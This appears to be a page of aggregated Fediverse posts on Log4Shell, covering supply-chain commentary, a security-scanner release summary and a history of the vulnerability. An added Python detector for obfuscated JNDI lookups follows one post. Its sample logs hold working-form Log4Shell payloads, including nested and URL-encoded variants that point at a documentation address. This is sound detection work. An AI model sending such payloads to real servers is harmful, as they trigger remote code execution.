home.social

#log4shell — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #log4shell, aggregated by home.social.

  1. ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

  6. You trust your dependencies? That’s the risk. From #Log4Shell to self-replicating worms, attacks don’t hit your code first — they hit your supply chain, often via packages.

    @MohammadAliEN explains what to watch: javapro.io/2026/04/23/the-whis

    #AppSec #Java #SupplyChainSecurity

  8. If your #Java stack relies on “upstream will fix it”, you already lost time. @spoole167 shows how real-world Java systems survive on unmaintained code — and what to do instead.

    Learn from the #SupplyChain reality: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI #Log4Shell

  18. ----------------

    🤖 Tool: MEDUSA — AI-first Security Scanner

    Overview

    MEDUSA is presented as an AI-first security scanner with more than 9,600 detection patterns focused on AI/ML applications, LLM agents, RAG pipelines, MCP servers and traditional codebases. The release v2026.5.0 emphasizes AI supply-chain coverage with a new Git scanning capability and repo poisoning detection.

    Key technical facts
    • Detection surface: 9,600+ AI security patterns targeting agent frameworks, MCP protocols, RAG components and editor/IDE config files.
    • CVE coverage: Product claims detection of 133 CVEs, with named detections including Log4Shell, Spring4Shell, XZ Utils backdoor, LangChain RCE, MCP remote code execution and React2Shell.
    • New rules: v2026.5.0 adds 45 attack rules for repo poisoning and 11 rules for MCP advanced attacks (schema poisoning, sampling injection, cross-server manipulation, Flowise RCE).
    • Repo poisoning specifics: Detection across 28+ AI editor and IDE file types (examples enumerated include Cursor, Cline, Copilot, Claude Code, Gemini CLI, Kiro, Codex CLI, Windsurf, Amazon Q, Roo Code).
    • Performance & outputs: Parallel processing for multi-core scanning, smart caching to skip unchanged files, and multiple export formats (JSON, HTML, Markdown, SARIF).

    Technical implications (reporting the release)

    The release documents a focused effort on AI supply-chain tactics: repo poisoning heuristics, editor-config weaponization, and MCP-targeted attack rules. The product adds path-relative FP filtering to reduce false positives when repo names previously matched heuristics. The Git scanning feature is described as a single-step repo analysis for supply-chain indicators.

    Constraints and scope

    The documentation frames MEDUSA as cross-platform (Windows/macOS/Linux) with IDE integrations and optional linter enhancements. The release notes list capabilities and detection counts; they do not provide operational deployment commands or step‑by‑step setup details.

    🔹 medusa #ai_security #repo_poisoning #log4shell #langchain

    🔗 Source: github.com/Pantheon-Security/m

  24. Log4Shell

    TIL about the breakdown of the Log4Shell shared library.

    • Date of occurrence
      • 24 November 2K21
      • location: a programmer at home with his son logging into Minecraft (which failed)
    • this vulnerability had existed unnoticed since 2013
    • it was privately disclosed to the Apache Software Foundation { Log4j is a project}
      • discloser: Chen Zhaojun of Alibaba Cloud's infosec team
      • date: 24 November 2021
    • exploit severity: MAXIMUM
      • it's simple to execute
    • estimated affected ratio: 50% of the internet (many hundreds of millions of devices)
    • the vulnerability abuses Log4j, allowing requests to arbitrary LDAP and JNDI servers
      • that allows attackers to
        • execute arbitrary Java code on server / client
        • leak sensitive data

    Inner workings

    • Log4j
      • open-source logging framework
      • enables programmers to log data within their applications
        • can include user input
      • is used ubiquitously in Java programs, especially enterprise software
      • originally written in 2001 by Ceki Gülcü
      • part of Apache Logging Services
        • a project of the Apache Software Foundation

    Tom Kellermann, a member of President Obama's Commission on Cyber Security

    • Apache is "one of the giant supports of a bridge which facilitates the connective tissue between the worlds of applications and computer environments"

    Affected commercial services

    • Amazon Web Services {AWS}
    • Cloudflare
    • iCloud {Apple infrastructure}
    • Minecraft {Java}
    • Steam {multi-platform gaming}
    • Tencent QQ

    Wiz and EY state that the vulnerability affected 93% of enterprise cloud environments

    The Log4Shell vulnerability's disclosure received strong reactions from cybersecurity experts.

    Cybersecurity company Tenable stated

    • the exploit is "the single biggest, most critical vulnerability ever"

    Ars Technica

    • arguably the most severe vulnerability ever

    Quote
    Log4j is foundational software. This 20+ year-old Java logging library quietly powers system events in applications worldwide, like user logins and calculation results. But this small piece of software had quietly become a dependency in thousands of projects across the Java ecosystem.

    Opinion & reaction

    • I'm blown away by the events leading to the tornadoes & typhoons that followed shortly after in the Open Source programming world
    • Fifty percent of software was affected, with 93% of the enterprise software subsection
    • Log4Shell is a critical-infrastructure-level shared library
    • nearly everyone using Java depends on its functional I/O

    Analysis

    • why do most Open Source software users only contact programmers when bugs are detected?
    • why do they (almost) never get compliments when it goes well?
    • programmers burn out after a while and leave projects abandoned
    • when you were a kid, your mom / dad / family complimented you on good results
      • programmers need the same
      • otherwise they will leave the projects

    Open Source programming is a thankless job

    • zero cash influx
    • no thank-yous
    • complaints even when software has long matured to stable levels
    • entitled users
    • threats to be doxxed or worse

    Be nice to Open Source programmers

    • if you have following contact here on the Fediverse with one, say thank you
    • don't expect replies (esp. when hundreds to thousands of followers are indicated)
    • realize you either can't code programs of that caliber or don't want to invest the time
    • I am lucky to have conversational contact on the Fediverse with critical infrastructure programmers
    • I always say thank you, because I know how hard it is to write software of that magnitude
    • when I review their software, I am critical, but formulate my words and sentences in a manner I would want to read them if places were switched
    • I am thankful first, thus send them Universal Love and Universal Energy
    • my toot history stands for these statements (on my other Fediverse accounts)

    Don't be a dick!

    Be nice to programmers

    Give them Love

    Z

    #Log4Shell #TIL #programming #data #Java #exploit #ZeroDay #technology #Enterprise #networking #OpenSource #POSIX #BSD #freeBSD #ghostBSD #openBSD #Linux #win64 #mac #history #reading

    Sources:

    github.blog/open-source/inside

    en.wikipedia.org/wiki/Log4Shell
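
Editor's note on the post above. It gives the mechanism in one line: Log4j expands `${...}` lookups inside logged strings, so a logged `${jndi:ldap://...}` makes the JVM fetch and run attacker-controlled code. What the post does not show is what that looks like on the wire and why the first naive `${jndi:` signatures failed: attackers nested other lookups (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) that Log4j resolved before reaching the JNDI lookup. The detector below is an added example, not code from the post's author or the Log4j project. It collapses nested lookups innermost-first the way Log4j's interpolator would and then matches; the log lines are constructed, 203.0.113.7 is an RFC 5737 documentation address, and the list of JNDI protocol handlers is an assumption covering the ones reported in the wild.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookups in log lines, obfuscated or not."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# After normalisation: a JNDI lookup using one of the handlers seen in the wild
# (assumed list; extend it if your JVM exposes other naming providers).
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|nis|http)\s*:[^}]*\}", re.I)


def _collapse(m) -> str:
    """Resolve one innermost lookup the way Log4j's interpolator would."""
    body = m.group(1)
    key, _, rest = body.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return m.group(0)            # the lookup we want to catch: keep it intact
    if key == "lower":
        return rest.lower()          # ${lower:J} -> j
    if key == "upper":
        return rest.upper()
    if ":-" in body:
        # ${name:-default}: an undefined lookup yields its default, which is how
        # ${::-j}${::-n}${::-d}${::-i} and ${env:NaN:-j} spell out "jndi".
        return body.split(":-", 1)[1]
    return m.group(0)                # some other lookup (${date:...}): leave it


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then collapse nested lookups innermost-first until stable."""
    text = unquote(text)             # access logs usually hold the payload URL-encoded
    for _ in range(max_rounds):
        collapsed = _INNERMOST.sub(_collapse, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect(line: str) -> Optional[str]:
    """Return the normalised JNDI lookup found in the line, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, indicator) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        indicator = detect(line)
        if indicator:
            hits.append((n, indicator))
    return hits


# Constructed Apache-style access log lines (not captured traffic). The last one
# is a benign request whose path merely contains the word "jndi".
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.7:1099/x}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:16 +0000] "GET /?q=%24%7B%24%7Benv%3ANaN%3A-j%7D'
    'ndi%3Aldap%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:14:02:17 +0000] "GET /docs/jndi-lookups.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, indicator in scan_lines(SAMPLE_LOG):
        print(f"line {n}: {indicator}")
```

Normalising before matching is the whole point: the four malicious lines carry four different byte patterns, but all collapse to a plain `${jndi:<handler>://host...}`, and the benign `/docs/jndi-lookups.html` line stays quiet because it never contains a `${` lookup. The same normaliser applies to any field Log4j might have logged, not just the User-Agent, which is where many early signatures looked.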

  29. #Log4Shell didn’t break #Java — it revealed it. @spoole167 shows how decades of “it still works” thinking left the Java #SupplyChain exposed & why maintenance is now a legal obligation.

    See what regulators expect from Java teams: javapro.io/2026/01/08/the-myth

    #CyberSecurity #AI

  32. 🔍 CVE-2021-44228 (Log4Shell)
    Three years later, Log4Shell is still being scanned for on the internet every single day.
    Why?
    Legacy Java apps
    Forgotten containers
    Vendors who never backported fixes

    👉 Breakdown & mitigation:
    cvedatabase.com/cve/CVE-2021-4
    #CVE #Log4Shell #CyberSecurity

  34. ICYMI: Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

  39. Software Composition Analysis: Protecting Against Log4Shell #shorts: Discover how software composition analysis can help prevent Log4Shell-like attacks. Learn how it could've helped your organization avoid the scramble. #Log4Shell #SoftwareAnalysis #Cybersecurity #Vulnerability youtube.com/shorts/3g9H_Gitv-8

  44. Who is responsible for your #Java dependencies when upstream disappears? @spoole167 traces how #Log4Shell exposed the reality of #OpenSource maintenance and why SBOMs, CRA & NIS2 changed the rules.

    Learn what “responsibility” means now: javapro.io/2026/01/08/the-myth

    #SupplyChain